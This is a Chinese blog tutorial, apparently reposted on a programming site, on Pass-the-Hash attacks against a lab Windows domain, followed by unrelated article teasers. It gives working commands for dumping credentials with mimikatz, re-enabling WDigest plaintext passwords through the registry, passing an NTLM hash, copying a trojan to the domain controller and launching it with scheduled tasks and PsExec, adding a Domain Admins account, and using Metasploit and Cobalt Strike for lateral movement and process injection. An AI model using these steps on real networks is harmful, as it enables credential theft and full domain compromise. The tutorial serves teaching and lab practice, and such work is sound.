PTH哈希传递攻击

news2024/11/15 12:42:45

PTH哈希传递攻击(Pass The Hash)

一、PTH简介

1、攻击原理

在使用 NTLM 身份验证的系统或服务上,用户密码永远不会以明文形式通过网络发送。 Windows 上的应用程序要求用户提供明文密码,然后调用 LsaLogonUser 类的 API,将该密码转换为一个或两个哈希值(LM或NTLM hash),然后将其发送到远程服务器进行 NTLM 身份验证。由于这种机制,我们只需要哈希值即可成功完成网络身份验证,而不需要明文密码。于是当我们获取到任意用户的 Hash 值就可以针对远程系统进行身份验证并模拟该用户,从而获取用户权限。

2、使用原因
  • 在Windows Server 2012 R2及之后版本的操作系统中,默认在内存中不会记录明文密码,只保存用户的 Hash。所以无法抓取到 lsass.exe 进程中的明文密码。

  • 随着信息安全意识的提高,大家都使用强密码,很多时候即使能拿到 hash 却无法解开。

3、LM Hash 与 NTLM Hash

1.3.1 LM Hash

(1)LM Hash(LAN Manager Hash):微软为了提高Windows操作系统的安全性而采用的散列加密算法。

存在的问题——易被破解:LM Hash明文密码被限制在14位以内,其本质上采用的是 DES 加密算法,所以 LM Hash 存在较容易被破解的问题。于是从 Windows Vista 和Windows Server 2008开始的 Windows 系统默认禁用了 LM Hash 。这里只是禁用,主要是为了保证系统的兼容性。如果LM Hash被禁用了,攻击者使用工具抓取的 LM Hash 通常为"aad3b435b51404eeaad3b435b51404ee"。

(2)NTLM Hash

NTLM Hash(NT LAN Manager):为了在提高安全性的同时保证兼容性,微软提出了 Windows NT 挑战/响应验证机制,称之为 NTLM 。个人版 Windows 从Windwos Vista 以后,服务器版本系统从 Windows server2003 以后,其认证方式均为 NTLM Hash。

二、PTH 攻击

1、实验环境

域控DC:Windows Server 2016 (ad.woniuxy.com)

IP:192.168.137.133(域管用户[域]:administrator)

域内计算机:Windows 7

IP:192.168.137.135(本地管理员[工作组]:administrator,域账号:zhangsan)

攻击机kali:192.168.137.129

域:woniuxy.com

2、使用 mimikatz 进行 PTH

此处实验环境,假设我们获取了本地管理员权限,且域管理员登录到这台电脑上(能从内存中获取域管理员的 NTML Hash)。

使用kali连接到Windows 7 并提权到SYSTEM权限

image-20240519132751184

使用kiwi收集账号信息

image-20240519133103965

上传 mimikatz 到 win7 上,在具有管理员权限的 cmd 中运行 mimikatz.exe,获取debug权限,而后查询当前机器中所有可用凭证。

image-20240519135139115

log                         # 在当前目录下写日志,输出结果均在日志中
privilege::debug            # 提升至调试(debug)权限(需要本地管理员权限)
sekurlsa::logonpasswords    # 查看所有可用的凭证(登录到本机的所有用户)

如果目标主机是Windows2012或更高版本,默认情况下是无法查看明文密码的,可以按照以下方式查看:

添加注册表:reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
强制锁屏:rundll32 user32.dll,LockWorkStation
查看明文密码: mimikatz.exe log privilege::Debug sekurlsa::logonpasswords exit    # 直接运行Mimikatz命令,不进入交互模式

image-20240519150047210

查找到域管理员的凭证信息,如上图,可以看到用户名为 Administrator ,属于woniuxy 这个域,登录的服务器为 DC 。获取到域管理员的 NTLM Hash。

利用 mimikatz 进行 PTH 攻击,命令如下:

# sekurlsa::pth /user:用户名 /domain:域名或者域控IP /ntlm:用户的NTLM Hash
sekurlsa::pth /user:administrator  /domain:192.168.137.133  /ntlm:48c8c0229d12aaa3cbc56fc2f4ada50c

image-20240519151328439

会弹出一个cmd,在弹出的cmd中,可以直接连接该主机、查看目录文件等操作。

dir \\192.168.137.133\c$    # 查看DC的C盘

image-20240519151508902

3、在域控上执行木马

(1)尝试往域控写入木马文件

复制木马到域控

copy c:\mm_64.exe \\ad\c$

在kali上开启监听

image-20240519152803737

(2)使用定时任务在域控上启动木马(失败)
# 旧版系统使用定时任务(at命令在新版本的操作系统中已经弃用)
at \\ad 15:27 cmd.exe /c "C:\mm_64.exe"
查看定时任务
at \\ad
​
#新版系统定时任务
CHTASKS /Create /TN HTTPBeacon /S AD  /TR C:\mm_64.exe /SC  ONCE /ST 15:40 /U 用户名 /P 密码
(3)使用psexec.exe启动木马
#复制PsExec到域控
copy c:\PsExec64.exe \\ad\c$
#使用psexec.exe启动木马
c:\>PsExec64.exe /accepteula /s \\ad cmd /c "C:\mm_64.exe"

image-20240519162606540

(4)使用psexec工具在域控上获取一个反弹Shell,用于执行命令:
PsExec.exe /accepteula \\ad cmd.exe
​
net user username password /add
net group "domain admins" username /add

image-20240519163017166

三、在MSF中操作和利用

1、使用Kiwi模块

meterpreter > hashdump
meterpreter > load kiwi
meterpreter > creds_all
meterpreter > getsystem 提权到SYSTEM权限(前提默认是本地管理员登录)
meterpreter > kiwi_cmd sekurlsa::logonpasswords

2、使用psexec模块

待完善

use exploit/windows/smb/psexec
show options
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.219.144
set SMBDomain woniuxy
set SMBUser administrator
set SMBPass 111:48c8c0229d12aaa3cbc56fc2f4ada50c

直接可以拿下域控。附:PSTools工具中自带命令的功能:

PsExec - 远程执行进程
PsFile - 显示远程打开的文件
PsGetSid - 显示计算机或用户的 SID
PsInfo - 列出有关系统的信息
PsPing - 测量网络性能
PsKill - 按名称或进程 ID 终止进程
PsList - 列出有关进程的详细信息
PsLoggedOn - 查看本地登录的用户以及通过资源共享 (完整源包含)
PsLogList - 转储事件日志记录
PsPasswd - 更改帐户密码
PsService - 查看和控制服务
PsShutdown - 关闭并选择性地重启计算机
PsSuspend - 挂起进程

微软在线帮助手册:PsExec - Sysinternals | Microsoft Learn

3、在CS中进行横向移动

(1)拿下域中某台主机,并确保CS上线,并提权

image-20240519203458008

image-20240519203529577

(2)运行net view,查看域内主机列表

image-20240519203652146

(3)在受控主机上右键运行Access -> Dump Hashes,获取所有本机Hash值,在通过View -> Credentials 查看所有Hash值列表。

image-20240519204013689

(4)在受控主机上按下图运行,获取域内的账号信息

image-20240519203937140

image-20240519204045282

(5)在Targets视图中,找到域内主机,右键Jump,并利用Hash进行登录上线。

image-20240519204300775

image-20240519204316576

image-20240519204400291

(6)使用 梼杌 或 谢公子 等CS插件,可以更加方便地获取域信息,制作票据,进行横向移动等。

4、在CS中利用进程注入获得域控权限

(1)只要是域管理员登录到Windows7主机上(无论是本地登录,或是远程桌面登录),则在Windows7中就存在域管理权限的进程,可以利用该进程提权到域管理员权限。

(2)浏览Windows7 的进程,并选择一个属于Woniuxy\Administrator用户的进程,进行Inject注入,再选择一个木马,即可以域管理员权限上线该木马。

image-20230816150410602

(3)在该上线的木马中运行 shell dir \\ad\c$ ,发现可以访问,后续操作一致。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2092287.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

AR 眼镜之-系统通知定制(通知中心)-实现方案

目录 📂 前言 AR 眼镜系统版本 系统通知定制 1. 🔱 技术方案 1.1 技术方案概述 1.2 实现方案 1)通知弹窗消失 2)通知中心显示 2. 💠 通知弹窗消失 2.1 通知弹窗显示时长到期后自动消失 2.2 将通知添加到通知…

vue3中ref绑定的节点顺序错乱

问题复现 眨眼睛这个是修正过了的,小友的应该是ref直接绑定navigationTextList对吧, 按正常想法肯定是既然这个数组会动态更新,我只需要index不就能确定是哪个节点啦,倘若只是静态数据应该不会有什么问题, ⚠️但如果出…

想了个创业的点子问老婆,她说你这不就是外包公司吗

年近35,老在想着万一毕业了咋整,其他的技能也不会,只能去“吉祥三保”、“铁人三项”了,但是吧又不甘心这十来年的“手艺”,又想着这几年大环境下那么多失业的同行,是不是也都有这方面的需求,于…

#读书#经济#《宏观经济学》by N.Gregory Mankiw 第十版 - 第2篇 古典理论:长期中的经济 - 第6章 开放的经济 - 6.3 汇率

在前面两节讨论了产品与服务以及资本在国家之间的流动之后,本节深入讨论了进行这些交易的价格,即两个国家之间进行贸易往来时使用的汇率。从介绍实际汇率和名义汇率的概念开始,讨论实际汇率和贸易余额的关系、两种汇率的决定因素以及财政政策…

九、JMeter之压力测试

文章目录 一、什么是压力测试二、压力测试关注点(一)压力测试分为两种测试场景(二)压测设置参数1.线程数:用于设置并发数量,也就是多少个用户同时访问2.Rame-Up Period(in seconds):控制每隔多少…

广电手机卡靠谱吗?

广电手机卡,作为中国广播电视网络集团有限公司(简称“中国广电”)官方发行的手机卡,是中国第四大运营商推出的移动通信产品。其靠谱性可以从以下几个方面进行评估: 一、网络覆盖与信号质量 网络覆盖广泛:广…

MDK 复制hex文件到根目录并加上日期 bat 脚本

工程目录示例 copy.bat ::关闭命令行显示 echo off :: GBK chcp 936 >nul setlocal EnableDelayedExpansion:设置文件夹路径 set "FolderName.\Objects":: set "FolderName.\Objects" :: #;copy %FolderName%\*.hex ..\*.hex //复制到根目录 :: c…

C++ 洛谷 哈希表(对应题库:哈希,hash)习题集及代码

马上就开学了,又一个卷季,不写点东西怎么行呢?辣么,我不准备写那些dalao们都懂得,熟练的,想来想去,最终还是写哈希表吧!提供讲解&题目&代码解析哦! 奉上题目链接…

LVS的加权轮询算法

http://kb.linuxvirtualserver.org/wiki/Weighted_Round-Robin_Scheduling 加权轮循调度是为了更好地处理不同处理能力的服务器。每个服务器都可以被分配一个权重,一个表示处理能力的整数值。权值较高的服务器比权值较低的服务器首先接收到新连接,权值较…

Django异步查询并下载CSV文件

Django异步查询并下载CSV文件 通过循环遍历数据库,自动生成CSV文件的表头和内容. Django V5.1 1. 视图 1.1 将同步的数据库查询转换为异步 async def get_blogs():# 使用sync_to_async包装Queryset方法blog_list await sync_to_async(Blog.objects.all)()return blog_list…

心觉:你的潜意识信念系统符合第一性原理吗

想要释放潜意识的力量,以及想要吸引力法则发挥作用 每天进行积极的自我暗示非常重要 自我暗示辅以视觉化目标及实现目标后的喜悦,其实就是重塑潜意识的过程 举个例子,比如你现在月收入5000,你想实现月入5万 怎么做到 你现在月…

5.11 飞行控制——定点飞行

文章目录 5.11 飞行控制——定点飞行5.11.1 加入三轴位置的飞行硬件系统 FLY(s)5.11.2 数学模型——三轴位置系统(1)x、y轴位置系统的微分方程(2)z轴位置系统的微分方程(3)三轴位置系统的状态空间方程 5.11…

MybatisPlus的基本使用

文章目录 介绍特性工作流程图添加依赖Spring Boot2Spring Boot3 配置定义Mapper接口并继承BaseMapperServer 接口自定义 Service 接口继承 IServie 接口自定义 Service 实现类,实现自定义接口并继承 ServiceImpl 添加Config类常用注解:TableNameTableIdTableFieldTa…

css中 display block属性的用法

前言 display:block是一个css属性,用于控制元素的显示方式。当元素的display属性设置为block时,元素会以块级元素的方式进行显示。 块级元素(block-level element)是指在HTML中以块的形式展示并独占一行的元素。与块级元素相对的…

MyBatis-Plus 入门与进阶教程

本教程将带领你快速上手 MyBatis-Plus&#xff0c;涵盖其基本功能、常用注解以及插件的使用。我们将通过代码实例一步步展示如何在实际项目中应用 MyBatis-Plus。 1. 快速开始 1.1 添加依赖 在 pom.xml 中添加以下依赖&#xff1a; <dependency><groupId>com.b…

【Hexo系列】【7】Butterfly主题使用及美化

本期将为大家讲解Hexo Butterfly主题的使用。 1. 主题介绍 hexo-theme-butterfly是基于 Molunerfinn 的 hexo-theme-melody 的基础上进行开发的&#xff0c;当前版本是v4.13.0。 主题官网&#xff1a;https://github.com/jerryc127/hexo-theme-butterfly 官网效果图&#x…

Unity(2022.3.41LTS) - 3D关节

目录 零. 简介 一、关节的类型及特点 二、关节的使用方法 三、关节的应用场景 四. 实例效果 零. 简介 在 Unity 中&#xff0c;关节&#xff08;Joints&#xff09;是实现物理模拟和复杂交互效果的重要组件。以下是对 Unity 关节更详细的介绍&#xff1a; 一、关节的类型…

JDBC中的execute, executeQuery, 和 executeUpdate方法区别

JDBC中的execute, executeQuery, 和 executeUpdate方法区别 1、execute(String sql)2、executeQuery(String sql)3、executeUpdate(String sql) &#x1f496;The Begin&#x1f496;点点关注&#xff0c;收藏不迷路&#x1f496; 1、execute(String sql) 功能&#xff1a;执…

Day89 代码随想录打卡|贪心算法篇---划分字母区间

题目&#xff08;leecode T763&#xff09;&#xff1a; 给你一个字符串 s 。我们要把这个字符串划分为尽可能多的片段&#xff0c;同一字母最多出现在一个片段中。 注意&#xff0c;划分结果需要满足&#xff1a;将所有划分结果按顺序连接&#xff0c;得到的字符串仍然是 s …

国产数据库打败Oracle?不存在的!

XC背景下国产数据库替代工程进行的如火如荼&#xff0c;数据库圈特别是Oracle的从业人员&#xff0c;既感受到深深的危机感&#xff0c;又带着些许的不甘&#xff0c;这种不甘主要来自于技术层面。 技术人员也有武士道精神&#xff0c;谁能打败我我服谁&#xff0c;谁的技术比…